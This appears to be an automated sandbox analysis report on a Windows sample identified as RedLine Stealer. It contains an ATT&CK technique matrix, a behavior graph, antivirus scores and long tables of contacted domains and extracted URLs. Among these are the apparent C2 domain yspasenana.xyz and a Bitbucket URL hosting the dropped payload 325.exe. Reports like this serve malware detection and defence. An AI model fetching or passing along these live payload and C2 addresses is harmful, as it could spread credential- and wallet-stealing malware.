                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery136Distributed Component Object ModelInput Capture31Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery451SSHClipboard Data2Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion231Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion231Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 452457 Sample: kS2dqbsDwD Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected RedLine Stealer 2->39 41 5 other signatures 2->41 7 kS2dqbsDwD.exe 14 2->7         started        process3 dnsIp4 21 iplogger.org 88.99.66.31, 443, 49711 HETZNER-ASDE Germany 7->21 23 is.gd 104.25.234.53, 443, 49712 CLOUDFLARENETUS United States 7->23 25 4 other IPs or domains 7->25 19 C:\Users\user\AppData\Roaming\325.exe, PE32 7->19 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 May check the online IP address of the machine 7->45 47 Sample or dropped binary is a compiled AutoHotkey binary 7->47 12 325.exe 3 7->12         started        file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 12->49 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->51 53 Performs DNS queries to domains with low reputation 12->53 55 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->55 15 325.exe 15 30 12->15         started        process9 dnsIp10 27 yspasenana.xyz 212.224.105.105, 49739, 49741, 49742 DE-FIRSTCOLOwwwfirst-colonetDE Germany 15->27 29 api.ip.sb 15->29 31 Tries to harvest and steal browser information (history, passwords, etc) 15->31 33 Tries to steal Crypto Currency Wallets 15->33 signatures11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    kS2dqbsDwD.exe20%VirustotalBrowse
                    kS2dqbsDwD.exe13%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\325.exe33%ReversingLabsByteCode-MSIL.Infostealer.Reline

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.1.kS2dqbsDwD.exe.140000000.0.unpack100%AviraHEUR/AGEN.1142275Download File
                    14.2.325.exe.400000.0.unpack100%AviraHEUR/AGEN.1140572Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    yspasenana.xyz1%VirustotalBrowse
                    api.ip.sb2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://ahkscript.org1%VirustotalBrowse
                    http://ahkscript.org0%Avira URL Cloudsafe
                    http://yspasenana.xyz/1%VirustotalBrowse
                    http://yspasenana.xyz/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    http://yspasenana.xyz40%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://yspasenana.xyz:80/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://yspasenana.xyz0%Avira URL Cloudsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    https://d301sr5gafysq2.cloudfront.net;0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    https://sectigo.com/CPS0C0%URL Reputationsafe
                    https://sectigo.com/CPS0C0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s3-w.us-east-1.amazonaws.com
                    52.217.201.169
                    truefalse
                      high
                      yspasenana.xyz
                      212.224.105.105
                      truetrueunknown
                      bitbucket.org
                      104.192.141.1
                      truefalse
                        high
                        iplogger.org
                        88.99.66.31
                        truefalse
                          high
                          is.gd
                          104.25.234.53
                          truefalse
                            high
                            bbuseruploads.s3.amazonaws.com
                            unknown
                            unknownfalse
                              high
                              api.ip.sb
                              unknown
                              unknownfalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://yspasenana.xyz/false
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtab325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                high
                                http://service.r325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://duckduckgo.com/ac/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                  high
                                  https://is.gd/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                    high
                                    http://ahkscript.orgkS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://web-security-reports.services.atlassian.com/csp-report/bb-website;kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                      high
                                      https://api.ip.sb/geoip325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://yspasenana.xyz4325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/envelope/D325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          high
                                          http://ns.adobe.c/g325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://yspasenana.xyz:80/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://tempuri.org/Endpoint/SetEnvironment325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Endpoint/GetUpdates325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://is.gd/bkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                            high
                                            https://support.google.com/chrome/?p=plugin_real325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/cThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://is.gd/nKi5S3HkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                high
                                                https://iplogger.org/ykS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://support.google.com/chrome/?p=plugin_pdf325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/VerifyUpdate325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.urwpp.deDPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cn325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://forms.real.com/real/realone/download.html?type=rpsp_us325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://support.a325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://yspasenana.xyz325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://bitbucket.org/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://support.google.com/chrome/?p=plugin_quicktime325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://ns.adobe.cobj325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.datacontract.org/2004/07/325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://bitbucket.org/luisadoma999/admin/downloads/325.exekS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                    high
                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0skS2dqbsDwD.exefalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://bitbucket.org/luisadoma999/admin/downloads/325.exelqkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/SetEnviron325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.carterandcone.coml325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.html325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://support.google.com/chrome/?p=plugin_shockwave325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://forms.rea325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://iplogger.org/1Spbs7%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://is.gd/nKi5S3$kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://aui-cdn.atlassian.comkS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://is.gd/nKi5S3%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designersG325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.fontbureau.com/designers/?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.founder.com.cn/cn/bThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://support.google.com/chrome/?p=plugin_wmp325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.sectigo.com0kS2dqbsDwD.exefalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://support.google.com/chrome/answer/6258784325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Endpoint/EnvironmentSettings325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/soap/envelope/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://support.google.com/chrome/?p=plugin_flash325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.tiro.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://iplogger.org/kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.goodfont.co.kr325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#kS2dqbsDwD.exefalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://support.google.com/chrome/?p=plugin_java325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Endpoint/VerifyUpdateResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://go.micros325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.typography.netD325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.galapagosdesign.com/staff/dennis.htm325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://fontfabrik.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://d301sr5gafysq2.cloudfront.net;kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      https://api.ipify.orgcookies//settinString.Removeg325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/fault325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://sectigo.com/CPS0CkS2dqbsDwD.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://sectigo.com/CPS0DkS2dqbsDwD.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://is.gd/nKi5S3kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.google.com/chrome/?p=plugin_divx325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/0325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.fonts.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.sandoll.co.kr325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://bbuseruploads.s3.amazonaws.com/is.gdkS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmpfalse
                                                                                                                  high
